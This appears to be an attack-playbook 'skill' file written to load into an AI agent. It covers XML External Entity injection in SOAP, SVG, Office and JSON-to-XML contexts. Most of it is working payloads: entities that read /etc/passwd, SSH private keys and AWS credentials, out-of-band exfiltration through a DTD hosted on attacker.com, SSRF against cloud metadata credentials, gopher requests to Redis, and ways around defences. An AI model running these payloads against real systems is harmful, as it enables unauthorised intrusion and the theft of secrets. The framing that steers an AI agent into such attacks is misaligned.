xxe-xml-external-entity
SKILL: XML External Entity Injection (XXE): Expert Attack Playbook
AI LOAD INSTRUCTION: Expert XXE techniques. Covers all injection contexts (SOAP, REST JSON→XML parsers, Office files, SVG), OOB exfiltration (critical when direct read fails), blind XXE detection, and XXE-to-SSRF chain. Base models often miss OOB and non-XML context XXE. For real-world CVE chains, Office docx XXE step-by-step, PHP expect:// RCE, and Solr XXE+RCE, load the companion SCENARIOS.md.
0. RELATED ROUTING
Also load:
- upload insecure files when XXE is reachable through SVG, OOXML, import, or preview pipelines
Extended Scenarios
Also load SCENARIOS.md when you need:
- Apache Solr XXE + RCE chain (CVE-2017-12629): XXE to read config, then VelocityResponseWriter for RCE
- Office docx XXE step-by-step: unzip → inject DOCTYPE into `word/document.xml` or `[Content_Types].xml` → repackage → upload
- DOCTYPE-based blind SSRF: a `PUBLIC` external DTD reference triggers an HTTP callback without entity reflection
- PHP `expect://` protocol via XXE: direct command execution when the expect extension is installed
- Blind XXE via error messages: force a file path error that leaks content in the exception text
- XXE in SOAP web services: inject entities into SOAP Envelope/Body elements
1. CLASSIC XXE PAYLOAD

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><data>&xxe;</data></root>
```

If `/etc/passwd` reflects in the response → confirmed file read.
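
As a rough sketch of how the probe and its confirmation step could be scripted during an authorized test, the helper below rebuilds the document above for an arbitrary path and checks a response body for passwd-style entries. The function names and the regex heuristic are illustrative assumptions, not part of the playbook.

```python
import re


def build_classic_payload(path: str = "/etc/passwd") -> str:
    """Return the classic in-band XXE probe for an absolute file path."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE foo [\n"
        f'<!ENTITY xxe SYSTEM "file://{path}">\n'
        "]>\n"
        "<root><data>&xxe;</data></root>"
    )


# Heuristic (assumption): passwd entries look like name:x:uid:gid:...
_PASSWD_ENTRY = re.compile(r"[\w.-]+:[^:\s]*:\d+:\d+:")


def reflects_passwd(response_body: str) -> bool:
    """True when the response body contains something shaped like a passwd entry."""
    return bool(_PASSWD_ENTRY.search(response_body))
```

The check is deliberately loose; a match should be confirmed by reading the response manually.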

2. ATTACK SURFACE DISCOVERY
Direct XML Inputs
- SOAP endpoints (`text/xml`, `application/soap+xml`)
- REST APIs accepting `application/xml`
- File upload: `.docx`, `.xlsx`, `.pptx` (Office Open XML)
- SVG uploads (SVG is XML)
- RSS/Atom feed parsers
- Web services with XML config import
Non-Obvious XML Processing
Change the `Content-Type` header on any JSON POST to:

```
Content-Type: application/xml
```

Then rewrite the body as XML; many backends use dual-format parsers or auto-detect the format.
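
The body rewrite can be sketched as a small converter. This is a minimal illustration that assumes a flat JSON object and a hypothetical `root` wrapper element; a real backend may expect different element names or nesting.

```python
import json
import xml.etree.ElementTree as ET


def json_to_xml(json_body: str, root_tag: str = "root") -> str:
    """Convert a flat JSON object into an equivalent XML body.

    The root tag name is a guess; adjust it to whatever the target accepts.
    """
    data = json.loads(json_body)
    root = ET.Element(root_tag)
    for key, value in data.items():
        child = ET.SubElement(root, key)
        child.text = str(value)
    return ET.tostring(root, encoding="unicode")
```

If the endpoint accepts the converted body, the DOCTYPE from section 1 can then be prepended by hand.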
PDF Generators
Some HTML→PDF tools (wkhtmltopdf, PrinceXML) are exposed to SSRF through embedded URLs, and may also parse external entities in SVG/XML included in the HTML.
3. OOB (OUT-OF-BAND) XXE — CRITICAL
Use when direct entity reflection fails (the server parses the XML but doesn't echo entity content):

Step 1: Blind detection

```xml
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://BURP_COLLABORATOR/">]>
<root>&xxe;</root>
```

A DNS/HTTP hit on the collaborator confirms XXE (even if no file content is returned).
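
When several endpoints are probed, it helps to know which request caused a given callback. One way to do that, sketched here under the assumption that the collaborator domain accepts arbitrary subdomains, is to embed a unique token per probe. The function name and domain parameter are hypothetical.

```python
import uuid


def build_blind_probe(collaborator_domain: str) -> tuple:
    """Return (token, payload); the token appears as a subdomain in the callback."""
    token = uuid.uuid4().hex
    payload = (
        "<!DOCTYPE foo [<!ENTITY xxe SYSTEM "
        f'"http://{token}.{collaborator_domain}/">]>\n'
        "<root>&xxe;</root>"
    )
    return token, payload
```

Record the token next to the endpoint it was sent to, then match it against the hostnames seen in the collaborator's interaction log.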
Step 2: OOB file exfiltration via attacker-hosted DTD

The attacker's server hosts a malicious DTD at `http://attacker.com/evil.dtd`:

```xml
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % exfil "<!ENTITY exfiltrate SYSTEM 'http://attacker.com/?data=%file;'>">
%exfil;
```

Payload sent to target:

```xml
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<root>&exfiltrate;</root>
```

The file contents appear in the attacker's HTTP server request log.
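
On the receiving side, the value can be pulled out of a logged request line. The sketch below assumes a log that records the raw request line (for example `GET /?data=... HTTP/1.1`) and the `data` parameter name used in the DTD above; the function name is hypothetical.

```python
from urllib.parse import parse_qs, urlsplit


def extract_exfil(request_line: str, param: str = "data"):
    """Return the exfiltrated value from a logged request line, or None."""
    parts = request_line.split()
    if len(parts) < 2:
        return None
    query = urlsplit(parts[1]).query
    values = parse_qs(query, keep_blank_values=True).get(param)
    return values[0] if values else None
```

Multi-line files often break the outgoing URL because of embedded newlines, so single-line files tend to be more reliable with this channel.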
Step 3: Error-based OOB (alternative when HTTP blocked)
Use an intentional error to leak data in the error message. The nested parameter-entity declaration must escape its `%` as `&#x25;`, because a bare `%` is not allowed inside an entity value:

```xml
<!-- attacker.com/error.dtd -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///NONEXISTENT/%file;'>">
%eval;
%error;
```
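
If the application returns the parser error, the leaked content sits after the bogus path prefix. The sketch below assumes a Java-style message such as `java.io.FileNotFoundException: /NONEXISTENT/<content> (No such file or directory)`; the exact wording varies by parser and OS, so both the marker and the suffix are assumptions to adjust.

```python
def extract_from_error(error_text: str, marker: str = "/NONEXISTENT/"):
    """Return the text leaked after `marker` in an error message, or None."""
    start = error_text.find(marker)
    if start == -1:
        return None
    leaked = error_text[start + len(marker):]
    # Trim the OS error suffix when present (message format is an assumption).
    suffix = " (No such file or directory)"
    end = leaked.rfind(suffix)
    return leaked[:end] if end != -1 else leaked
```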

4. XXE FILE READ TARGETS
Linux:

```
/etc/passwd
/etc/shadow (requires root)
/etc/hosts
/proc/self/environ ← environment variables (DB creds, API keys)
/proc/self/cmdline ← process command line
/var/log/apache2/access.log ← may contain passwords in URLs
/home/USER/.ssh/id_rsa ← SSH private key
/home/USER/.aws/credentials ← AWS keys
/home/USER/.bash_history
```

Windows:

```
C:\Windows\System32\drivers\etc\hosts
C:\inetpub\wwwroot\web.config ← ASP.NET connection strings
C:\xampp\htdocs\wp-config.php ← WordPress DB credentials
C:\Users\Administrator\.ssh\id_rsa
```

5. SVG XXE (file upload context)
When SVG uploads are accepted and served/processed:

```xml
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg" width="500" height="100">
<text font-size="16">&xxe;</text>
</svg>
```

Upload as `.svg` → `GET /uploads/file.svg` → file contents appear in the response when the server has parsed or rendered the SVG (for example, rasterizing it to a thumbnail).

6. OFFICE FILE XXE (docx/xlsx/pptx)
Office files are ZIP archives containing XML. Inject into `[Content_Types].xml` or `word/document.xml`:

```bash
# Step 1: extract
unzip original.docx -d extracted/

# Step 2: edit word/document.xml and add a malicious DTD
# Add after <?xml version="1.0" encoding="UTF-8" standalone="yes"?>:
# <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
# Then use &xxe; inside document text

# Step 3: repackage
cd extracted && zip -r ../malicious.docx .
```
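
The same three steps can be done in memory with Python's `zipfile` module. This is a minimal sketch: the function name is hypothetical, it only inserts the DOCTYPE after the XML declaration, and the `&xxe;` reference still has to be placed in the document text separately.

```python
import io
import zipfile

DOCTYPE = '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'


def inject_doctype(docx_bytes: bytes, member: str = "word/document.xml") -> bytes:
    """Return a copy of the archive with DOCTYPE added to `member`.

    All other archive members are copied unchanged.
    """
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            data = src.read(info.filename)
            if info.filename == member:
                text = data.decode("utf-8")
                end = text.find("?>")
                # Insert right after the XML declaration when there is one.
                cut = end + 2 if text.startswith("<?xml") and end != -1 else 0
                text = text[:cut] + "\n" + DOCTYPE + text[cut:]
                data = text.encode("utf-8")
            dst.writestr(info.filename, data)
    return out.getvalue()
```

Working on bytes avoids touching the filesystem; pass `member="[Content_Types].xml"` to target the other file named above.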

7. SOAP ENDPOINT XXE
SOAP requests parse XML by definition. Inject an external entity into the SOAP envelope:

```xml
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<getUser>
<id>&xxe;</id>
</getUser>
</soap:Body>
</soap:Envelope>
```

8. XXE → SSRF CHAIN
An XXE external entity can point to internal HTTP endpoints (identical to SSRF):

```xml
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root>&xxe;</root>
```

This reuses the XXE read primitive as SSRF in a single payload: the parser fetches the internal URL and, where entities are reflected, returns the response body.
9. XInclude ATTACK
When the server processes XInclude (importing XML from another source) but you can't control the DOCTYPE:

```xml
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include href="file:///etc/passwd" parse="text"/>
</foo>
```

Works in: Apache Cocoon, Xerces-J, libxml2 with XInclude support enabled.
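
To see the mechanism locally, Python's standard library ships an XInclude processor in `xml.etree.ElementInclude`. The sketch below is only an illustration of text inclusion, not one of the parsers listed above, and its default loader takes plain filesystem paths rather than `file://` URLs. The function name is hypothetical.

```python
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude


def xinclude_text(path: str) -> str:
    """Expand an xi:include with parse="text" and return the included text."""
    doc = (
        '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
        f'<xi:include href="{path}" parse="text"/>'
        "</foo>"
    )
    root = ET.fromstring(doc)
    # The default loader opens href as a local file path.
    ElementInclude.include(root)
    return root.text
```

No DOCTYPE appears anywhere in the document, which is why this route survives parsers that reject DTDs but still run XInclude processing.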
10. PROTOCOL HANDLERS IN XXE

```xml
<!-- HTTP (SSRF) -->
<!ENTITY xxe SYSTEM "http://internal.company.com/admin/">
<!-- File read -->
<!ENTITY xxe SYSTEM "file:///etc/passwd">
<!-- PHP wrapper (if PHP with libxml2) -->
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!-- Decode base64 in response to get file contents -->
<!-- FTP (exfil / port scan) -->
<!ENTITY xxe SYSTEM "ftp://attacker.com:21/x">
<!-- Gopher (Redis, SMTP) -->
<!ENTITY xxe SYSTEM "gopher://127.0.0.1:6379/info%0d%0a">
```
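
The base64 decoding step for the `php://filter` wrapper can be sketched as follows. The helper name is hypothetical, and it assumes the reflected value may have been wrapped or padded with whitespace by the response template.

```python
import base64


def decode_filter_output(reflected: str) -> str:
    """Decode base64 text reflected by the php://filter wrapper."""
    cleaned = "".join(reflected.split())  # drop line breaks and spaces
    return base64.b64decode(cleaned).decode("utf-8", errors="replace")
```

Using `errors="replace"` keeps the helper usable on binary files, at the cost of lossy output for non-text bytes.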

11. BYPASSING DEFENSES
Parser blocks DOCTYPE
Try XInclude (no DOCTYPE needed, see §9).
Only allows specific XML schemas
If schema validation occurs: inject comments or CDATA after schema validation but before entity processing.
Response encoding issues (binary in response)
Use PHP filter for base64:

```xml
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
```

Network restrictions on OOB
Use DNS-only OOB via `SYSTEM "file://HASH.attacker.com"`: no HTTP is required, and the DNS lookup itself leaks data.

12. QUICK DETECTION CHECKLIST
□ Find XML input point (or JSON→XML transformation)
□ Send basic entity: <!ENTITY xxe "test"> → &xxe; in body → does "test" reflect?
□ If yes → file read: SYSTEM "file:///etc/passwd"
□ If no reflection → OOB test via Collaborator URL
□ If OOB hit → set up attacker DTD for file exfiltration
□ Try SVG upload with XXE
□ Try Content-Type: application/xml on JSON endpoints
□ Try XInclude if DOCTYPE-based fails
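
The internal-entity reflection check from the checklist can be illustrated locally with Python's `xml.etree.ElementTree`, which expands entities declared in the internal DTD subset. This is only a demonstration of what "reflects" means; against a real target the same comparison is made on the HTTP response. The function name is hypothetical.

```python
import xml.etree.ElementTree as ET

PROBE = '<!DOCTYPE foo [<!ENTITY xxe "test">]><root>&xxe;</root>'


def expands_internal_entities(xml_text: str) -> bool:
    """True when the parsed root element's text is the entity value "test"."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return False
    return (root.text or "") == "test"
```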

13. LOCAL DTD INJECTION (BLIND XXE AMPLIFICATION)
When outbound connections are blocked but local DTD files exist on the server:
Technique

```xml
<!-- Override an entity defined in a LOCAL DTD file -->
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
```

Inside the quoted `ISOamso` value every `%` is written as `&#x25;` (and the innermost one as `&#x26;#x25;`), since a literal `%` is not permitted in an entity value in the internal subset.

Common Local DTD Paths
Linux

```
/usr/share/yelp/dtd/docbookx.dtd # GNOME Help
/usr/share/xml/fontconfig/fonts.dtd # Fontconfig
/usr/share/sgml/docbook/xml-dtd-*/docbookx.dtd
/usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd
/opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd
/usr/share/struts/struts-config_1_0.dtd # Apache Struts
/usr/share/nmap/nmap.dtd # Nmap
/opt/zaproxy/xml/alert.dtd # OWASP ZAP
```

Windows

```
C:\Windows\System32\wbem\xml\cim20.dtd # WMI
C:\Windows\System32\wbem\xml\wmi20.dtd # WMI
C:\Program Files\IBM\WebSphere\*.dtd # WebSphere
C:\Program Files (x86)\Lotus\*.dtd # Lotus Notes
```

Inside JAR Files (Java Applications)

```
jar:file:///usr/share/java/tomcat-*.jar!/javax/servlet/resources/web-app_2_3.dtd
jar:file:///opt/wildfly/modules/*.jar!/org/jboss/as/*.dtd
jar:file:///usr/share/java/struts2-core-*.jar!/struts-2.5.dtd
```

Why This Works
- External connections blocked (firewall/WAF/egress filter)
- But file:// to LOCAL files is usually allowed
- Local DTD is trusted → entity overrides inject attacker-controlled definitions
- Error messages or blind extraction via file:// still works